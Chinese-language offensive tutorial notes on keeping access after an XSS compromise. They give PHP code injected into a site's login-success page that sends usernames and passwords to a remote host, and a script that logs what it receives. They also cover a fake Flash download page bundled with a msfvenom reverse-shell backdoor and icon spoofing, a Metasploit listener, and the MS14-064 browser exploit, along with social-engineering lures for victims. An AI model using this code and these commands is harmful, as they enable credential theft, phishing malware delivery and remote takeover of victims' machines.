XSS-后台植入Cookie&表单劫持(权限维持)

权限维持,获取账密后,防止权限被杀掉后无法再次取得权限。

取得权限不一定后台就能登录
后台能登录不一定是取得权限

  • 条件:已取得相关web权限后

    • 写入代码到登录成功文件(登录成功后的文件,里面的用户名和密码都是正确的,需要将正确的代码发送出来,可以使用js自动触发发送到远程地址进行处理),利用beef或xss平台实时监控Cookie等凭据实现权限维持

      • 实现下面成功页面账密劫持的案例的重要前提:改写/插入下面的语句到成功登录的那个文件夹的指定位置获取账密
      # 写完后,在成功的页面被访问时会偷偷的触发
      $a = '<script src="http://xxx:80/get.php?username='.$用户名.'&pass='.$密码.'"></script>';
      echo $a;

      远程可以这么写,把内容自动写入文件。

      <?php
      $u = $_GET['username'];
      $p = $_GET['pass'];
      $myfile = fopen('newfile.txt','w+');
      fwrite($myfile,$u);
      fwrite($myfile,' | ');
      fwrite($myfile,$p);
      fwrite($myfile,'\n');
      fclose($myfile);
      ?>
    • 若存在同源策略或防护情况下(获取cookie时是残缺的),Cookie获取失败可采用表单劫持或数据明文传输实现

XSS-Flash钓鱼配合MSF捆绑上线

XSS经常配个钓鱼实现。

  • 条件:beef上线受控后或直接钓鱼(受害者爱看SESE)

    • 使用Flash的伪造项目,欺骗对方误以为这就是flash官网

    • 把下载地址”立即下载”的敌方的网址换为后门地址

    • 后门需要和正常的文件进行捆绑

      • 生成后门(,然后给后门加免杀)
                                                       #我方服务器IP地址                        生成软件
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=6666 -f exe > flash.exe
      • 下载官方文件-保证安装正常
    • 压缩捆绑文件-解压提取运行

      • 捆绑方法:
        • 选中两个exe,选择rar或者zip压缩
        • 选择”创建自解压文件”
        • 选择”高级”,选择”自解压”选项,常规类选择解压到”C:\windows\tmp”
        • 点击”设置”,
          • 解压后运行:那个正常的文件,C:\windows\tmp\flash.exe
          • 解压前运行:后门文件”C:\windows\tmp\xxx.exe”
        • 最后一步,将图标进行修改:
          • 可以使用Restorator进行修改
            • 导出官方ICO,覆盖掉伪装文件原来的ICO
          • 可以使用py或者其它cmd的方式进行修改。

XSS-浏览器网马配合MSF访问上线

  • MSF配置监听状态-(木马监听)

    • 和上面的配置一样
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 0.0.0.0 # 代表本地的网卡
    set lport 6666
    run
  • 受害方

    • 攻击的目标是客户端,对方必须下载下来并且安装才能成功。
      • 诱使受害者访问URL-语言要适当 -(直接发给对方)
        • 例如:对方感兴趣的视频,需要点击视频跳出更新按钮,合情合理。
        • 访问界面的没关系问题
      • 使用XSS让其自动执行脚本,跳转
  • MS浏览器漏洞

    • 浏览器漏洞,直接攻击浏览器,省去了安装。
    • 访问特定地址后触发,危害性太大,网上资料不全面。
    • 危害性较小:MS14
      • Kali自带MSF平台
      • 思路:让对方访问即可,当对方访问特定地址时,特定地址会自动上线到我方攻击机
      • 前提:特定版本,且对方没有打补丁
  • 条件:beef上线受控后或直接钓鱼(浏览器存在0day)

    • 配置MSF生成URL
    use exploit/windows/browser/ms14_064_ole_code_execution
    set allowpowershellprompt true
    set target 1
    run
    • 诱使受害者访问URL-语言要适当